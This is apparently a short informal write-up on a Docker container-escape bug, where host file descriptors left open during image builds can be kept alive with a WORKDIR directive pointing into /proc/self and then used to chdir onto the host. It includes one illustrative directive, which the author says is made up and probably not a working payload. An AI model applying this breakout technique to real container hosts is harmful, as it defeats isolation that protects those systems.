Its long been a classic to abuse accidentally exposed file-descriptors through /proc/self/fds to break out of sandboxes, so its kinda fun to see a similar sort of bug impacting Docker. and enabling a container break-out either at run-time or during build time.

As you would expect Docker does close any file descriptors that point back to the host system before handing over control to the final sandboxed process.However during the build process some of the sensitive file descriptors that belong to the host-system are still open. So it is possible to hold a reference to the descriptor so that it remains open after docker has closed their references using the WORKDIR directive, for example: WORKDIR /proc/self/fds/5 (5 is just a made up descriptor number) and probably not a working payload for this.

With the reference held open, one could potentially chdir out into the host system and have escaped the confines of the container filesystem.